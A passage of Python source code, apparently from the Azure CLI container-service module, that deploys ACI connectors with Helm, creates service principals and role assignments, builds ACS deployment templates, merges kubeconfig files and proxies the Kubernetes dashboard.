location.replace(' ', '').lower() # Validate the location upon the ACI avaiable regions _validate_aci_location(norm_location) # Get the credentials from a AKS instance _, browse_path = tempfile.mkstemp() aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path) subscription_id = _get_subscription_id(cmd.cli_ctx) # Get the TenantID profile = Profile(cli_ctx=cmd.cli_ctx) _, _, tenant_id = profile.get_login_credentials() # Check if we want the linux connector if os_type.lower() in ['linux', 'both']: _helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal, client_secret, subscription_id, tenant_id, aci_resource_group, norm_location, 'Linux', instance.enable_rbac, instance.fqdn) # Check if we want the windows connector if os_type.lower() in ['windows', 'both']: _helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal, client_secret, subscription_id, tenant_id, aci_resource_group, norm_location, 'Windows', instance.enable_rbac, instance.fqdn) def _helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal, client_secret, subscription_id, tenant_id, aci_resource_group, norm_location, os_type, use_rbac, masterFqdn): rbac_install = "true" if use_rbac else "false" node_taint = 'azure.com/aci' helm_release_name = connector_name.lower() + '-' + os_type.lower() + '-' + norm_location node_name = 'virtual-kubelet-' + helm_release_name k8s_master = 
'https://{}'.format(masterFqdn) logger.warning("Deploying the ACI connector for '%s' using Helm", os_type) try: values = 'env.nodeName={},env.nodeTaint={},env.nodeOsType={},image.tag={},rbac.install={}'.format( node_name, node_taint, os_type, image_tag, rbac_install) if service_principal: values += ",env.azureClientId=" + service_principal if client_secret: values += ",env.azureClientKey=" + client_secret if subscription_id: values += ",env.azureSubscriptionId=" + subscription_id if tenant_id: values += ",env.azureTenantId=" + tenant_id if aci_resource_group: values += ",env.aciResourceGroup=" + aci_resource_group if norm_location: values += ",env.aciRegion=" + norm_location # Currently, we need to set the master FQDN. # This is temporary and we should remove it when possible values += ",env.masterUri=" + k8s_master if helm_cmd == "install": subprocess.call(["helm", "install", url_chart, "--name", helm_release_name, "--set", values]) elif helm_cmd == "upgrade": subprocess.call(["helm", "upgrade", helm_release_name, url_chart, "--set", values]) except subprocess.CalledProcessError as err: raise CLIError('Could not deploy the ACI connector Chart: {}'.format(err)) def k8s_uninstall_connector(cmd, client, name, resource_group_name, connector_name='aci-connector', location=None, graceful=False, os_type='Linux'): from subprocess import PIPE, Popen helm_not_installed = "Error : Helm not detected, please verify if it is installed." # Check if Helm is installed locally try: Popen(["helm"], stdout=PIPE, stderr=PIPE) except OSError: raise CLIError(helm_not_installed) # Get the credentials from a AKS instance _, browse_path = tempfile.mkstemp() aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path) # Validate if the RG exists rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name) # Auto assign the location if location is None: location = rg_location norm_location = location.replace(' ', '').lower() if os_type.lower() in ['linux', 'both']: helm_release_name = connector_name.lower() + '-linux-' + norm_location node_name = 'virtual-kubelet-' + helm_release_name _undeploy_connector(graceful, node_name, helm_release_name) if os_type.lower() in ['windows', 'both']: helm_release_name = connector_name.lower() + '-windows-' + norm_location node_name = 'virtual-kubelet-' + helm_release_name _undeploy_connector(graceful, node_name, helm_release_name) def _undeploy_connector(graceful, node_name, helm_release_name): if graceful: logger.warning('Graceful option selected, will try to drain the node first') from subprocess import PIPE, Popen kubectl_not_installed = 'Kubectl not detected, please verify if it is installed.' 
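    # Verify that kubectl is available before draining the node; the helm
    # release and the virtual-kubelet node are removed afterwards.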
try: Popen(["kubectl"], stdout=PIPE, stderr=PIPE) except OSError: raise CLIError(kubectl_not_installed) try: drain_node = subprocess.check_output( ['kubectl', 'drain', node_name, '--force', '--delete-local-data'], universal_newlines=True) if not drain_node: raise CLIError('Could not find the node, make sure you' + ' are using the correct --os-type') except subprocess.CalledProcessError as err: raise CLIError('Could not find the node, make sure you are using the correct' + ' --connector-name, --location and --os-type options: {}'.format(err)) logger.warning("Undeploying the '%s' using Helm", helm_release_name) try: subprocess.call(['helm', 'del', helm_release_name, '--purge']) except subprocess.CalledProcessError as err: raise CLIError('Could not undeploy the ACI connector Chart: {}'.format(err)) try: subprocess.check_output( ['kubectl', 'delete', 'node', node_name], universal_newlines=True) except subprocess.CalledProcessError as err: raise CLIError('Could not delete the node, make sure you are using the correct' + ' --connector-name, --location and --os-type options: {}'.format(err)) def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret): # use get_progress_controller hook = cli_ctx.get_progress_controller(True) hook.add(messsage='Creating service principal', value=0, total_val=1.0) logger.info('Creating service principal') # always create application with 5 years expiration start_date = datetime.datetime.utcnow() end_date = start_date + relativedelta(years=5) result = create_application(rbac_client.applications, name, url, [url], password=client_secret, start_date=start_date, end_date=end_date) service_principal = result.app_id # pylint: disable=no-member for x in range(0, 10): hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0) try: create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client) break # TODO figure out what exception AAD throws here sometimes. 
except Exception as ex: # pylint: disable=broad-except logger.info(ex) time.sleep(2 + 2 * x) else: return False hook.add(message='Finished service principal creation', value=1.0, total_val=1.0) logger.info('Finished service principal creation') return service_principal def _add_role_assignment(cli_ctx, role, service_principal, delay=2, scope=None): # AAD can have delays in propagating data, so sleep and retry hook = cli_ctx.get_progress_controller(True) hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0) logger.info('Waiting for AAD role to propagate') for x in range(0, 10): hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0) try: # TODO: break this out into a shared utility library create_role_assignment(cli_ctx, role, service_principal, scope=scope) break except CloudError as ex: if ex.message == 'The role assignment already exists.': break logger.info(ex.message) except: # pylint: disable=bare-except pass time.sleep(delay + delay * x) else: return False hook.add(message='AAD role propagation done', value=1.0, total_val=1.0) logger.info('AAD role propagation done') return True def _get_subscription_id(cli_ctx): _, sub_id, _ = Profile(cli_ctx=cli_ctx).get_login_credentials(subscription_id=None) return sub_id def _get_default_dns_prefix(name, resource_group_name, subscription_id): # Use subscription id to provide uniqueness and prevent DNS name clashes name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10] if not name_part[0].isalpha(): name_part = (str('a') + name_part)[0:10] resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16] return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6]) def list_acs_locations(cmd, client): return { "productionRegions": regions_in_prod, "previewRegions": regions_in_preview } def _generate_windows_profile(windows, admin_username, admin_password): if windows: if not admin_password: raise CLIError('--admin-password is required.') if len(admin_password) < 6: raise CLIError('--admin-password must be at least 6 characters') windows_profile = { "adminUsername": admin_username, "adminPassword": admin_password, } return windows_profile return None def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix, master_vm_size, master_osdisk_size, master_vnet_subnet_id, master_first_consecutive_static_ip, master_storage_profile): master_pool_profile = {} default_master_pool_profile = { "count": int(master_count), "dnsPrefix": dns_name_prefix + 'mgmt', } if api_version == "2017-07-01": default_master_pool_profile = _update_dict(default_master_pool_profile, { "count": int(master_count), "dnsPrefix": dns_name_prefix + 'mgmt', "vmSize": master_vm_size, "osDiskSizeGB": int(master_osdisk_size), "vnetSubnetID": master_vnet_subnet_id, "firstConsecutiveStaticIP": master_first_consecutive_static_ip, "storageProfile": master_storage_profile, }) if not master_profile: master_pool_profile = default_master_pool_profile else: master_pool_profile = _update_dict(default_master_pool_profile, master_profile) return master_pool_profile def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix, agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id, agent_ports, agent_storage_profile): agent_pool_profiles = [] default_agent_pool_profile = { "count": int(agent_count), "vmSize": agent_vm_size, "osType": os_type, "dnsPrefix": dns_name_prefix + 'agent', } if api_version == "2017-07-01": default_agent_pool_profile = 
_update_dict(default_agent_pool_profile, { "count": int(agent_count), "vmSize": agent_vm_size, "osDiskSizeGB": int(agent_osdisk_size), "osType": os_type, "dnsPrefix": dns_name_prefix + 'agent', "vnetSubnetID": agent_vnet_subnet_id, "ports": agent_ports, "storageProfile": agent_storage_profile, }) if agent_profiles is None: agent_pool_profiles.append(_update_dict(default_agent_pool_profile, {"name": "agentpool0"})) else: # override agentPoolProfiles by using the passed in agent_profiles for idx, ap in enumerate(agent_profiles): # if the user specified dnsPrefix, we honor that # otherwise, we use the idx to avoid duplicate dns name a = _update_dict({"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap) agent_pool_profiles.append(_update_dict(default_agent_pool_profile, a)) return agent_pool_profiles def _generate_outputs(name, orchestrator_type, admin_username): # define outputs outputs = { "masterFQDN": { "type": "string", "value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long }, "sshMaster0": { "type": "string", "value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long }, } if orchestrator_type.lower() != "kubernetes": outputs["agentFQDN"] = { "type": "string", "value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long } # override sshMaster0 for non-kubernetes scenarios outputs["sshMaster0"] = { "type": "string", "value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long } return outputs def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile, agent_pool_profiles, ssh_key_value, admin_username, windows_profile): properties = { "orchestratorProfile": { "orchestratorType": orchestrator_type, }, "masterProfile": master_pool_profile, "agentPoolProfiles": agent_pool_profiles, "linuxProfile": { "ssh": { "publicKeys": [ { "keyData": ssh_key_value } ] }, "adminUsername": admin_username }, } if api_version == "2017-07-01": properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version if windows_profile is not None: properties["windowsProfile"] = windows_profile return properties # pylint: disable=too-many-locals def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None, location=None, admin_username="azureuser", api_version=None, master_profile=None, master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="", master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="", agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0, agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="", orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None, windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument validate=False, no_wait=False): """Create a new Acs. :param resource_group_name: The name of the resource group. The name is case insensitive. :type resource_group_name: str :param deployment_name: The name of the deployment. 
:type deployment_name: str :param dns_name_prefix: Sets the Domain name prefix for the cluster. The concatenation of the domain name and the regionalized DNS zone make up the fully qualified domain name associated with the public IP address. :type dns_name_prefix: str :param name: Resource name for the container service. :type name: str :param ssh_key_value: Configure all linux machines with the SSH RSA public key string. Your key should include three parts, for example 'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm :type ssh_key_value: str :param content_version: If included it must match the ContentVersion in the template. :type content_version: str :param admin_username: User name for the Linux Virtual Machines. :type admin_username: str :param api_version: ACS API version to use :type api_version: str :param master_profile: MasterProfile used to describe master pool :type master_profile: dict :param master_vm_size: The size of master pool Virtual Machine :type master_vm_size: str :param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine :type master_osdisk_size: int :param master_count: The number of masters for the cluster. :type master_count: int :param master_vnet_subnet_id: The vnet subnet id for master pool :type master_vnet_subnet_id: str :param master_storage_profile: The storage profile used for master pool. Possible value could be StorageAccount, ManagedDisk. :type master_storage_profile: str :param agent_profiles: AgentPoolProfiles used to describe agent pools :type agent_profiles: dict :param agent_vm_size: The size of the Virtual Machine. :type agent_vm_size: str :param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine :type agent_osdisk_size: int :param agent_vnet_subnet_id: The vnet subnet id for master pool :type agent_vnet_subnet_id: str :param agent_ports: the ports exposed on the agent pool :type agent_ports: list :param agent_storage_profile: The storage profile used for agent pool. Possible value could be StorageAccount, ManagedDisk. :type agent_storage_profile: str :param location: Location for VM resources. :type location: str :param orchestrator_type: The type of orchestrator used to manage the applications on the cluster. :type orchestrator_type: str or :class:`orchestratorType <Default.models.orchestratorType>` :param tags: Tags object. :type tags: object :param windows: If true, the cluster will be built for running Windows container. :type windows: bool :param admin_password: The adminstration password for Windows nodes. 
Only available if --windows=true :type admin_password: str :param bool raw: returns the direct response alongside the deserialized response :rtype: :class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>` instance that returns :class:`DeploymentExtended <Default.models.DeploymentExtended>` :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if raw=true :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value): raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value)) subscription_id = _get_subscription_id(cmd.cli_ctx) if not dns_name_prefix: dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id) rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name) if location is None: location = rg_location # if api-version is not specified, or specified in a version not supported # override based on location if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]: if location in regions_in_preview: api_version = "2017-07-01" # 2017-07-01 supported in the preview locations else: api_version = "2017-01-31" # 2017-01-31 applied to other locations if orchestrator_type.lower() == 'kubernetes': principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id, dns_name_prefix, location, name) client_secret = principal_obj.get("client_secret") service_principal = principal_obj.get("service_principal") elif windows: raise CLIError('--windows is only supported for Kubernetes clusters') # set location if void if not location: location = '[resourceGroup().location]' # set os_type os_type = 'Linux' if windows: os_type = 'Windows' # set agent_ports if void if not agent_ports: agent_ports = [] # get windows_profile windows_profile = _generate_windows_profile(windows, admin_username, admin_password) # The resources.properties fields should match with ContainerServices' api model master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix, master_vm_size, master_osdisk_size, master_vnet_subnet_id, master_first_consecutive_static_ip, master_storage_profile) agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix, agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id, agent_ports, agent_storage_profile) outputs = _generate_outputs(name, orchestrator_type, admin_username) properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile, agent_pool_profiles, ssh_key_value, admin_username, windows_profile) resource = { "apiVersion": api_version, "location": location, "type": "Microsoft.ContainerService/containerServices", "name": name, "tags": tags, "properties": properties, } template = { "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", "contentVersion": "1.0.0.0", "resources": [ resource, ], "outputs": outputs, } params = {} if service_principal is not None and client_secret is not None: properties["servicePrincipalProfile"] = { "clientId": service_principal, "secret": "[parameters('clientSecret')]", } template["parameters"] = { "clientSecret": { "type": "secureString", "metadata": { "description": "The client secret for the service principal" } } } params = { "clientSecret": { "value": client_secret } } # Due to SPN replication latency, we do a few retries here 
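    # (The deployment below is retried up to max_retry times, sleeping 3 s
    # whenever the failure message indicates the service principal has not
    # propagated yet; any other CloudError is re-raised immediately.)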
max_retry = 30 retry_exception = Exception(None) for _ in range(0, max_retry): try: return _invoke_deployment(cmd.cli_ctx, resource_group_name, deployment_name, template, params, validate, no_wait) except CloudError as ex: retry_exception = ex if 'is not valid according to the validation procedure' in ex.message or \ 'The credentials in ServicePrincipalProfile were invalid' in ex.message or \ 'not found in Active Directory tenant' in ex.message: time.sleep(3) else: raise ex raise retry_exception def store_acs_service_principal(subscription_id, client_secret, service_principal, file_name='acsServicePrincipal.json'): obj = {} if client_secret: obj['client_secret'] = client_secret if service_principal: obj['service_principal'] = service_principal config_path = os.path.join(get_config_dir(), file_name) full_config = load_service_principals(config_path=config_path) if not full_config: full_config = {} full_config[subscription_id] = obj with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600), 'w+') as spFile: json.dump(full_config, spFile) def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'): config_path = os.path.join(get_config_dir(), file_name) config = load_service_principals(config_path) if not config: return None return config.get(subscription_id) def load_service_principals(config_path): if not os.path.exists(config_path): return None fd = os.open(config_path, os.O_RDONLY) try: with os.fdopen(fd) as f: return shell_safe_json_parse(f.read()) except: # pylint: disable=bare-except return None def _invoke_deployment(cli_ctx, resource_group_name, deployment_name, template, parameters, validate, no_wait, subscription_id=None): from azure.mgmt.resource.resources import ResourceManagementClient from azure.mgmt.resource.resources.models import DeploymentProperties properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental') smc = get_mgmt_service_client(cli_ctx, ResourceManagementClient, subscription_id=subscription_id).deployments if validate: logger.info('==== BEGIN TEMPLATE ====') logger.info(json.dumps(template, indent=2)) logger.info('==== END TEMPLATE ====') return smc.validate(resource_group_name, deployment_name, properties) return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties) def k8s_get_credentials(cmd, client, name, resource_group_name, path=os.path.join(os.path.expanduser('~'), '.kube', 'config'), ssh_key_file=None, overwrite_existing=False): """Download and install kubectl credentials from the cluster master :param name: The name of the cluster. :type name: str :param resource_group_name: The name of the resource group. 
:type resource_group_name: str :param path: Where to install the kubectl config file :type path: str :param ssh_key_file: Path to an SSH key file to use :type ssh_key_file: str """ acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name) _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing) def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing): if ssh_key_file is not None and not os.path.isfile(ssh_key_file): raise CLIError('Private key file {} does not exist'.format(ssh_key_file)) dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member location = acs_info.location # pylint: disable=no-member user = acs_info.linux_profile.admin_username # pylint: disable=no-member _mkdir_p(os.path.dirname(path)) path_candidate = path ix = 0 while os.path.exists(path_candidate): ix += 1 path_candidate = '{}-{}-{}'.format(path, name, ix) # TODO: this only works for public cloud, need other casing for national clouds acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location), '.kube/config', path_candidate, key_filename=ssh_key_file) # merge things if path_candidate != path: try: merge_kubernetes_configurations(path, path_candidate, overwrite_existing) except yaml.YAMLError as exc: logger.warning('Failed to merge credentials to kube config file: %s', exc) logger.warning('The credentials have been saved to %s', path_candidate) def _handle_merge(existing, addition, key, replace): if addition[key]: if existing[key] is None: existing[key] = addition[key] return for i in addition[key]: for j in existing[key]: if i['name'] == j['name']: if replace or i == j: existing[key].remove(j) else: raise CLIError('A different object named {} already exists in {}'.format(i['name'], key)) existing[key].append(i) def load_kubernetes_configuration(filename): try: with open(filename) as stream: return yaml.safe_load(stream) except (IOError, OSError) as ex: if getattr(ex, 'errno', 0) == errno.ENOENT: raise CLIError('{} does not exist'.format(filename)) else: raise except (yaml.parser.ParserError, UnicodeDecodeError) as ex: raise CLIError('Error parsing {} ({})'.format(filename, str(ex))) def merge_kubernetes_configurations(existing_file, addition_file, replace): existing = load_kubernetes_configuration(existing_file) addition = load_kubernetes_configuration(addition_file) # rename the admin context so it doesn't overwrite the user context for ctx in addition.get('contexts', []): try: if ctx['context']['user'].startswith('clusterAdmin'): admin_name = ctx['name'] + '-admin' addition['current-context'] = ctx['name'] = admin_name break except (KeyError, TypeError): continue if addition is None: raise CLIError('failed to load additional configuration from {}'.format(addition_file)) if existing is None: existing = addition else: _handle_merge(existing, addition, 'clusters', replace) _handle_merge(existing, addition, 'users', replace) _handle_merge(existing, addition, 'contexts', replace) existing['current-context'] = addition['current-context'] # check that ~/.kube/config is only read- and writable by its owner if platform.system() != 'Windows': existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode)) if not existing_file_perms.endswith('600'): logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.', existing_file, existing_file_perms) with open(existing_file, 'w+') as stream: yaml.dump(existing, stream, default_flow_style=False) current_context = 
addition.get('current-context', 'UNKNOWN') msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file) print(msg) def _get_host_name(acs_info): """ Gets the FQDN from the acs_info object. :param acs_info: ContainerService object from Azure REST API :type acs_info: ContainerService """ if acs_info is None: raise CLIError('Missing acs_info') if acs_info.master_profile is None: raise CLIError('Missing master_profile') if acs_info.master_profile.fqdn is None: raise CLIError('Missing fqdn') return acs_info.master_profile.fqdn def _get_username(acs_info): """ Gets the admin user name from the Linux profile of the ContainerService object. :param acs_info: ContainerService object from Azure REST API :type acs_info: ContainerService """ if acs_info.linux_profile is not None: return acs_info.linux_profile.admin_username return None def _get_acs_info(cli_ctx, name, resource_group_name): """ Gets the ContainerService object from Azure REST API. :param name: ACS resource name :type name: String :param resource_group_name: Resource group name :type resource_group_name: String """ container_services = cf_container_services(cli_ctx, None) return container_services.get(resource_group_name, name) def _rand_str(n): """ Gets a random string """ choices = string.ascii_lowercase + string.digits return ''.join(random.SystemRandom().choice(choices) for _ in range(n)) def _mkdir_p(path): # http://stackoverflow.com/a/600612 try: os.makedirs(path) except OSError as exc: # Python >2.5 if exc.errno == errno.EEXIST and os.path.isdir(path): pass else: raise def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count): instance = client.get(resource_group_name, container_service_name) instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member # null out the service principal because otherwise validation complains if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes: instance.service_principal_profile = None # null out the windows profile so that validation doesn't complain about not having the admin password instance.windows_profile = None return client.create_or_update(resource_group_name, container_service_name, instance) def list_container_services(cmd, client, resource_group_name=None): ''' List Container Services. 
''' svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \ if resource_group_name else client.list() return list(svc_list) def show_service_principal(client, identifier): object_id = _resolve_service_principal(client, identifier) return client.get(object_id) def _resolve_service_principal(client, identifier): # todo: confirm with graph team that a service principal name must be unique result = list(client.list(filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier))) if result: return result[0].object_id try: uuid.UUID(identifier) return identifier # assume an object id except ValueError: raise CLIError("service principal '{}' doesn't exist".format(identifier)) def create_application(client, display_name, homepage, identifier_uris, available_to_other_tenants=False, password=None, reply_urls=None, key_value=None, key_type=None, key_usage=None, start_date=None, end_date=None): from azure.graphrbac.models import GraphErrorException password_creds, key_creds = _build_application_creds(password, key_value, key_type, key_usage, start_date, end_date) app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants, display_name=display_name, identifier_uris=identifier_uris, homepage=homepage, reply_urls=reply_urls, key_credentials=key_creds, password_credentials=password_creds) try: return client.create(app_create_param) except GraphErrorException as ex: if 'insufficient privileges' in str(ex).lower(): link = 'https://docs.microsoft.com/en-us/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long raise CLIError("Directory permission is needed for the current user to register the application. " "For how to configure, please refer '{}'. 
Original error: {}".format(link, ex)) raise def _build_application_creds(password=None, key_value=None, key_type=None, key_usage=None, start_date=None, end_date=None): if password and key_value: raise CLIError('specify either --password or --key-value, but not both.') if not start_date: start_date = datetime.datetime.utcnow() elif isinstance(start_date, str): start_date = dateutil.parser.parse(start_date) if not end_date: end_date = start_date + relativedelta(years=1) elif isinstance(end_date, str): end_date = dateutil.parser.parse(end_date) key_type = key_type or 'AsymmetricX509Cert' key_usage = key_usage or 'Verify' password_creds = None key_creds = None if password: password_creds = [PasswordCredential(start_date=start_date, end_date=end_date, key_id=str(uuid.uuid4()), value=password)] elif key_value: key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value, key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)] return (password_creds, key_creds) def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None): if rbac_client is None: rbac_client = get_graph_rbac_management_client(cli_ctx) if resolve_app: try: uuid.UUID(identifier) result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier))) except ValueError: result = list(rbac_client.applications.list( filter="identifierUris/any(s:s eq '{}')".format(identifier))) if not result: # assume we get an object id result = [rbac_client.applications.get(identifier)] app_id = result[0].app_id else: app_id = identifier return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True)) def create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None): return _create_role_assignment(cli_ctx, role, assignee, resource_group_name, scope) def _create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None, resolve_assignee=True): from azure.cli.core.profiles import ResourceType, get_sdk factory = get_auth_management_client(cli_ctx, scope) assignments_client = factory.role_assignments definitions_client = factory.role_definitions scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id) role_id = _resolve_role_id(role, scope, definitions_client) object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION, 'RoleAssignmentCreateParameters', mod='models', operation_group='role_assignments') parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id) assignment_name = uuid.uuid4() custom_headers = None return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers) def _build_role_scope(resource_group_name, scope, subscription_id): subscription_scope = '/subscriptions/' + subscription_id if scope: if resource_group_name: err = 'Resource group "{}" is redundant because scope is supplied' raise CLIError(err.format(resource_group_name)) elif resource_group_name: scope = subscription_scope + '/resourceGroups/' + resource_group_name else: scope = subscription_scope return scope def _resolve_role_id(role, scope, definitions_client): role_id = None try: uuid.UUID(role) role_id = role except ValueError: pass if not role_id: # retrieve role id role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role))) if not role_defs: raise CLIError("Role '{}' doesn't 
exist.".format(role)) elif len(role_defs) > 1: ids = [r.id for r in role_defs] err = "More than one role matches the given name '{}'. Please pick a value from '{}'" raise CLIError(err.format(role, ids)) role_id = role_defs[0].id return role_id def _resolve_object_id(cli_ctx, assignee): client = get_graph_rbac_management_client(cli_ctx) result = None if assignee.find('@') >= 0: # looks like a user principal name result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee))) if not result: result = list(client.service_principals.list( filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee))) if not result: # assume an object id, let us verify it result = _get_object_stubs(client, [assignee]) # 2+ matches should never happen, so we only check 'no match' here if not result: raise CLIError("No matches in graph database for '{}'".format(assignee)) return result[0].object_id def _get_object_stubs(graph_client, assignees): params = GetObjectsParameters(include_directory_object_references=True, object_ids=assignees) return list(graph_client.objects.get_objects_by_object_ids(params)) def _update_dict(dict1, dict2): cp = dict1.copy() cp.update(dict2) return cp def subnet_role_assignment_exists(cli_ctx, scope): network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7" factory = get_auth_management_client(cli_ctx, scope) assignments_client = factory.role_assignments for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'): if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id): return True return False def aks_browse(cmd, client, resource_group_name, name, disable_browser=False, listen_port='8001'): if not which('kubectl'): raise CLIError('Can not find kubectl executable in PATH') proxy_url = 'http://127.0.0.1:{0}/'.format(listen_port) _, browse_path = tempfile.mkstemp() # TODO: need to add an --admin option? aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path) # find the dashboard pod's name try: dashboard_pod = subprocess.check_output( ["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system", "--output", "name", "--selector", "k8s-app=kubernetes-dashboard"], universal_newlines=True) except subprocess.CalledProcessError as err: raise CLIError('Could not find dashboard pod: {}'.format(err)) if dashboard_pod: # remove any "pods/" or "pod/" prefix from the name dashboard_pod = str(dashboard_pod).split('/')[-1].strip() else: raise CLIError("Couldn't find the Kubernetes dashboard pod.") # launch kubectl port-forward locally to access the remote dashboard if in_cloud_console(): # TODO: better error handling here. response = requests.post('http://localhost:8888/openport/8001') result = json.loads(response.text) term_id = os.environ.get('ACC_TERM_ID') if term_id: response = requests.post('http://localhost:8888/openLink/{}'.format(term_id), json={"url": result['url']}) logger.warning('To view the console, please open %s in a new tab', result['url']) else: logger.warning('Proxy running on %s', proxy_url) logger.warning('Press CTRL+C to close the tunnel...') if not disable_browser: wait_then_open_async(proxy_url) try: subprocess.call(["kubectl", "--kubeconfig", browse_path, "--namespace", "kube-system", "port-forward", dashboard_pod, "{0}:9090".format(listen_port)]) except KeyboardInterrupt: # Let command processing finish gracefully after the user presses [Ctrl+C] pass finally: # TODO: Better error handling here. 
